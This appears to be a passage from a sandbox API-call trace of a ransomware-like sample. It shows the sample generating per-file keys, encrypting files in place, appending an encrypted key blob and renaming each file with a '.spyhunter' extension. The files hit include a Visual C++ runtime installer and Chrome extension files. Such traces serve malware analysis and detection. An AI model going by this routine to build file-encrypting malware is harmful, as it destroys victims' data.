1 [0136.730] GetProcessHeap () returned 0x2c0000 [0136.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2a0 | out: pbBuffer=0x25cf2a0) returned 1 [0136.730] GetProcessHeap () returned 0x2c0000 [0136.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf298*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf298*=0x30) returned 1 [0136.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.731] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0136.731] StrStrW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch=".txt") returned 0x0 [0136.731] GetProcessHeap () returned 0x2c0000 [0136.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.732] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf25c*=0x2800, lpOverlapped=0x0) returned 1 [0136.733] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.733] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf25c*=0x2800, lpOverlapped=0x0) returned 1 [0136.734] GetProcessHeap () returned 0x2c0000 [0136.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.734] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.734] WriteFile (in: hFile=0x18c, lpBuffer=0x25cf29c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x25cf29c*, lpNumberOfBytesWritten=0x25cf25c*=0x4, lpOverlapped=0x0) returned 1 [0136.734] WriteFile (in: hFile=0x18c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf25c*=0x30, lpOverlapped=0x0) returned 1 [0136.734] CloseHandle (hObject=0x18c) returned 1 [0136.783] GetProcessHeap () returned 0x2c0000 [0136.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0136.783] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter") returned 154 [0136.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.spyhunter" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.spyhunter")) returned 1 [0136.784] GetProcessHeap () returned 0x2c0000 [0136.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0136.784] GetProcessHeap () returned 0x2c0000 [0136.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.784] GetProcessHeap () returned 0x2c0000 [0136.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb83e0 | out: hHeap=0x2c0000) returned 1 [0136.784] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2a0 | out: pbBuffer=0x25cf2a0) returned 1 [0136.784] GetProcessHeap () returned 0x2c0000 [0136.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf298*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf298*=0x30) returned 1 [0136.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0136.795] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0136.795] GetProcessHeap () returned 0x2c0000 [0136.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.796] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf25c*=0x2800, lpOverlapped=0x0) returned 1 [0136.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.837] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf25c*=0x2800, lpOverlapped=0x0) returned 1 [0136.844] GetProcessHeap () returned 0x2c0000 [0136.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.844] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.844] WriteFile (in: hFile=0x178, lpBuffer=0x25cf29c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x25cf29c*, lpNumberOfBytesWritten=0x25cf25c*=0x4, lpOverlapped=0x0) returned 1 [0136.844] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf25c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf25c*=0x30, lpOverlapped=0x0) returned 1 [0136.844] CloseHandle (hObject=0x178) returned 1 [0136.845] GetProcessHeap () returned 0x2c0000 [0136.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.845] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.spyhunter") returned 172 [0136.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0136.845] GetProcessHeap () returned 0x2c0000 [0136.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.846] GetProcessHeap () returned 0x2c0000 [0136.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.846] GetProcessHeap () returned 0x2c0000 [0136.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19ff8 | out: hHeap=0x2c0000) returned 1 [0136.846] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf298 | out: pbBuffer=0x25cf298) returned 1 [0136.846] GetProcessHeap () returned 0x2c0000 [0136.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.846] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf290*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf290*=0x30) returned 1 [0136.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.847] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0136.847] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".txt") returned 0x0 [0136.847] GetProcessHeap () returned 0x2c0000 [0136.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.847] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf254*=0x1103, lpOverlapped=0x0) returned 1 [0136.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffeefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.861] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1103, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf254*=0x1103, lpOverlapped=0x0) returned 1 [0136.861] GetProcessHeap () returned 0x2c0000 [0136.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.861] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.861] WriteFile (in: hFile=0x178, lpBuffer=0x25cf294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x25cf294*, lpNumberOfBytesWritten=0x25cf254*=0x4, lpOverlapped=0x0) returned 1 [0136.861] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf254*=0x30, lpOverlapped=0x0) returned 1 [0136.861] CloseHandle (hObject=0x178) returned 1 [0136.862] GetProcessHeap () returned 0x2c0000 [0136.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.862] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.spyhunter") returned 165 [0136.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.spyhunter")) returned 1 [0136.863] GetProcessHeap () returned 0x2c0000 [0136.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.863] GetProcessHeap () returned 0x2c0000 [0136.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.863] GetProcessHeap () returned 0x2c0000 [0136.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d870 | out: hHeap=0x2c0000) returned 1 [0136.863] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf298 | out: pbBuffer=0x25cf298) returned 1 [0136.863] GetProcessHeap () returned 0x2c0000 [0136.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf290*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf290*=0x30) returned 1 [0136.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json") returned 160 [0136.864] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0136.864] GetProcessHeap () returned 0x2c0000 [0136.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.864] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf254*=0x160, lpOverlapped=0x0) returned 1 [0136.865] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.865] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf254*=0x160, lpOverlapped=0x0) returned 1 [0136.865] GetProcessHeap () returned 0x2c0000 [0136.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.865] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.865] WriteFile (in: hFile=0x178, lpBuffer=0x25cf294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x25cf294*, lpNumberOfBytesWritten=0x25cf254*=0x4, lpOverlapped=0x0) returned 1 [0136.865] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf254, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf254*=0x30, lpOverlapped=0x0) returned 1 [0136.866] CloseHandle (hObject=0x178) returned 1 [0136.866] GetProcessHeap () returned 0x2c0000 [0136.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.866] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.spyhunter") returned 170 [0136.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.spyhunter")) returned 1 [0136.867] GetProcessHeap () returned 0x2c0000 [0136.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.867] GetProcessHeap () returned 0x2c0000 [0136.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.867] GetProcessHeap () returned 0x2c0000 [0136.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f19e60 | out: hHeap=0x2c0000) returned 1 [0136.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf288 | out: pbBuffer=0x25cf288) returned 1 [0136.869] GetProcessHeap () returned 0x2c0000 [0136.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.870] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf280*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf280*=0x30) returned 1 [0136.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.870] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json") returned 158 [0136.870] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.870] GetProcessHeap () returned 0x2c0000 [0136.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.870] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf244*=0xd4, lpOverlapped=0x0) returned 1 [0136.871] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.871] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x25cf244, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf244*=0xd4, lpOverlapped=0x0) returned 1 [0136.872] GetProcessHeap () returned 0x2c0000 [0136.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.872] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.872] WriteFile (in: hFile=0x178, lpBuffer=0x25cf284*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf244, lpOverlapped=0x0 | out: lpBuffer=0x25cf284*, lpNumberOfBytesWritten=0x25cf244*=0x4, lpOverlapped=0x0) returned 1 [0136.872] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf244, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf244*=0x30, lpOverlapped=0x0) returned 1 [0136.872] CloseHandle (hObject=0x178) returned 1 [0136.872] GetProcessHeap () returned 0x2c0000 [0136.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.872] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.spyhunter") returned 168 [0136.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.spyhunter")) returned 1 [0136.873] GetProcessHeap () returned 0x2c0000 [0136.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.873] GetProcessHeap () returned 0x2c0000 [0136.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.873] GetProcessHeap () returned 0x2c0000 [0136.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d6e8 | out: hHeap=0x2c0000) returned 1 [0136.875] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf280 | out: pbBuffer=0x25cf280) returned 1 [0136.875] GetProcessHeap () returned 0x2c0000 [0136.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.875] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf278*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf278*=0x30) returned 1 [0136.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0136.875] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json") returned 158 [0136.875] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.875] 